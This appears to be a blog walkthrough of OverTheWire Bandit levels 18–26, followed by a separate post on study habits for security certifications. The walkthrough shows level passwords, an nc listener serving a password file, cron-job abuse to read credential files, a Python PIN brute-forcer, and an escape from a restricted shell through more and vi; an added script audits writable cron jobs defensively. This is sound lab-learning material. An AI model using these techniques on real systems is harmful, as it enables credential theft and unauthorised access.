> kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd


Level 18 to 19

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

steve@steve-nuc:~$ scp bandit18@bandit.labs.overthewire.org:readme ~
bandit18@bandit.labs.overthewire.org's password:
readme 100% 33 0.0KB/s 00:00
steve@steve-nuc:~$ cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x


Level 19 to 20

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.

bandit19@melinda:~$ ls -l
total 8
-rwsr-x--- 1 bandit20 bandit19 7370 Nov 14  2014 bandit20-do
bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j


Level 20 to 21

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think

In the first ssh session:
bandit20@melinda:~$ nc -lvp 65535 < /etc/bandit_pass/bandit20
Listening on [0.0.0.0] (family 0, port 65535)

In the second ssh session:
bandit20@melinda:~$ ./suconnect 65535

Back in the first ssh session it has sent us the password:
Connection from [127.0.0.1] port 65535 [tcp/*] accepted (family 2, sport 42398)
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr


Level 21 to 22

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

bandit21@melinda:~$ ls /etc/cron.d
behemoth4_cleanup leviathan5_cleanup natas25_cleanup~ semtex0-ppc
cron-apt manpage3_resetpw_job natas26_cleanup semtex5
cronjob_bandit22 melinda-stats natas27_cleanup sysstat
cronjob_bandit23 natas-session-toucher php5 vortex0
cronjob_bandit24 natas-stats semtex0-32 vortex20
cronjob_bandit24_root natas25_cleanup semtex0-64
bandit21@melinda:~$ cat /etc/cron.d/cronjob_bandit22
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@melinda:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@melinda:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI


Level 22 to 23

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

bandit22@melinda:~$ cat /etc/cron.d/cronjob_bandit23
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@melinda:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@melinda:~$ sh /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@melinda:~$ sh /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@melinda:~$ echo I am user bandit23 | md5sum | cut -d ‘ ‘ -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@melinda:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n


Level 23 to 24

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 "./$i"
        rm -f "./$i"
    fi
done

Find a writable location since my previous attempts to output the password to a file in /tmp were deleted:
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Directory /run/lock looks good. Created my script there:
bandit23@melinda:~$ cat /run/lock/bandit24pwd.sh
#!/bin/sh
cat /etc/bandit_pass/bandit24 >> /run/lock/password

bandit23@melinda:~$ chmod +x /run/lock/bandit24pwd.sh
bandit23@melinda:~$ cp /run/lock/bandit24pwd.sh /var/spool/bandit24
bandit23@melinda:~$ ls /var/spool/bandit24
bandit24pwd.sh script.sh
bandit23@melinda:~$ ls /run/lock
bandit24pwd.sh hello password
bandit23@melinda:~$ cat /run/lock/password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
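The three cron levels above all hinge on the same weakness: a job that runs as another user executes a script sitting somewhere a less privileged user can write. The check below is an added example, not code from the Bandit wargame or the original write-up; it reads a cron.d-style file (6th field is the user, 7th the command) and reports jobs whose command file, or the directory holding it, is group- or world-writable, using the same `find -perm` test the write-up used to locate writable places. The fixture it builds is constructed for the demo.

```shell
# Added example, not part of the original write-up.
# audit_cron_file <cron.d file>: print "user command (path is group/world writable)"
# for each job whose script or script directory is writable by group/others.
# Returns 1 if any such job was found, 0 otherwise.
audit_cron_file() {
    risky=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*|[A-Za-z_]*=*) continue ;; esac   # blanks, comments, VAR=value
        set -f            # keep the "* * * * *" schedule fields from globbing
        set -- $line
        set +f
        [ $# -ge 7 ] || continue
        user=$6 cmd=$7
        case "$cmd" in /*) ;; *) continue ;; esac                 # only absolute paths
        [ -e "$cmd" ] || continue
        for path in "$cmd" "$(dirname "$cmd")"; do
            # same permission test the write-up used: group or other write bit set
            if [ -n "$(find "$path" -prune \( -perm -g+w -o -perm -o+w \) -print 2>/dev/null)" ]; then
                printf '%s %s (%s is group/world writable)\n' "$user" "$cmd" "$path"
                risky=1
                break
            fi
        done
    done < "$1"
    return $risky
}

# Constructed fixture: a world-writable spool directory (like /var/spool/bandit24)
# beside a properly locked-down script, plus a two-job cron file. Prints its path.
make_demo_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/spool" "$d/bin"
    printf '#!/bin/sh\necho hi\n' > "$d/spool/job.sh"
    printf '#!/bin/sh\necho hi\n' > "$d/bin/safe.sh"
    chmod 1777 "$d/spool"
    chmod 755 "$d/bin" "$d/spool/job.sh" "$d/bin/safe.sh"
    printf '# constructed cron.d file\n* * * * * bandit24 %s/spool/job.sh\n* * * * * root %s/bin/safe.sh\n' \
        "$d" "$d" > "$d/cron"
    printf '%s\n' "$d"
}

fixture=$(make_demo_fixture)
if audit_cron_file "$fixture/cron"; then
    echo "no risky cron jobs"
else
    echo "risky cron jobs found"   # expected: the spool job is reported, safe.sh is not
fi
```

Run it against a real /etc/cron.d/* file with audit_cron_file to get the same report for a host's own jobs.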


Level 24 to 25

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

bandit24@melinda:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1111
Wrong! Please enter the correct pincode. Try again.

This looks like a good application for Python.

pin.py

#!/usr/bin/env python
import socket

# Password for bandit24, followed by the space that separates it from the pin
password = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ "
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Sending: password and pin...\n")
sock.connect(('localhost', 30002))
data = sock.recv(1024)  # read the daemon's banner before sending guesses
for x in range(0, 10000):
    # Pins are zero-padded to four digits: 0000 .. 9999
    sock.sendall((password + str(x).zfill(4) + "\n").encode())
    data = sock.recv(1024).decode()
    if "Wrong!" not in data:
        print(data)
        break  # the daemon closes the connection after a correct pin
sock.close()

bandit24@melinda:/var/lock$ python pin.py
Sending: password and pin…

Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.


Level 25 to 26

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

I ssh to bandit26:
bandit25@melinda:~$ ssh -i bandit26.sshkey bandit26@localhost

I’m immediately logged out. Let’s check out the shell for bandit26.
bandit25@melinda:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

The shell for bandit26 is /usr/bin/showtext:
bandit25@melinda:~$ cat /usr/bin/showtext
#!/bin/sh
more ~/text.txt
exit 0

In order to get more to pause and not exit, I reduced my terminal window size to 5 lines.

I ssh in again and more is activated. Reading up on more, I find that when paused you can enter the “v” character to enter vi. Once in the vi shell you can read a file with “:r </path/to/file>”.

_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
:r /etc/bandit_pass/bandit26

I pressed the spacebar eleven times to page with more and see the password:
_ _ _ _ ___ __
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_


Level 26 to 27

At this moment, level 27 does not exist yet.


Hacking the Learning Process

Working in information security sometimes feels like drinking from the ocean through a fire hose. The more I learn, the more I feel like a newb and realize that I’ve only found the tip of the iceberg. It takes a lot of passion for the subject to keep studying and doing hands-on labs day after day without burning out.

The idea for this post came to me when I recently answered a Reddit post asking about how we learn about security. There’s so much to learn that many people don’t know where to start because it can be overwhelming. In my case I have a hard time staying on track once I start learning something because I keep finding another thread to pull and start unraveling the fabric of a related subject.

I’m going to share what’s worked for me over the years that I’ve served in the military and worked in IT. Over 20 years ago I was an Undesignated Airman in the Navy, meaning I didn’t have a formal training school for a rating (or MOS in other branches). In order to take the test for Aviation Electrician I had to digest a stack of books called the Navy Electrical and Electronic Training Series (NEETS) that was about a foot tall. Through the years I had to study an even larger stack of manuals to be advanced in rank. After the Navy, the study habits that I am going to outline here helped me to earn various IT and security certifications including OSCP, OSWP, CCNA, CCA, and Security+.

Start with a written plan. In the case of information security, there are so many things to learn that it’s easy to feel overwhelmed. Think about your knowledge and skills gaps and write down your plan of study. If you’re working on a certification, decide how long you think it will take to cover each section of the study guide and set an exam date. Book the exam right away. The sense of impending doom will help you to stay on track. If something comes up that delays taking the exam you can usually cancel or reschedule if you contact the testing center in advance.

While studying, find a quiet place where you can read out loud without bothering anyone. I’ve found that reading out loud leads to better memory retention, most likely because of the increase in neural connections required to speak it vs. only think it.

For memorization write out flash cards. Again, the extra step of writing it down seems to lead to better memory retention vs. only reading it silently. As you flip through the stack of flash cards, remove any cards from the stack that you can easily answer. This leaves the more difficult cards that will be reviewed more often. Repeat the process of reviewing the stack, removing cards that you can easily answer until you have removed every card. Then repeat the process by reviewing the whole stack again.

For hands-on learning, write a lesson plan as if you’re going to teach the subject to a complete beginner. Create a PowerPoint presentation with screenshots, along with any commands that need to be run at each step. Finally, install screen cast software and record your screen and voice while giving your presentation. When you review the video it will be easy to spot where you had problems or things went awry. Work through the issues to refine your presentation and then record a new screen cast. When I’m working in VMware doing security labs to learn new things, I like to put screenshots and commands to run in Microsoft OneNote and use those notes on a second screen to work through my screen casts. If you work in a role that presents to customers or groups, a screen cast or web cast can help you to refine your speech and visual presentation. Recording screen casts is something I’ve only recently started doing in order to prepare presentations for a local security meetup group.

What are your tips to hack the learning process?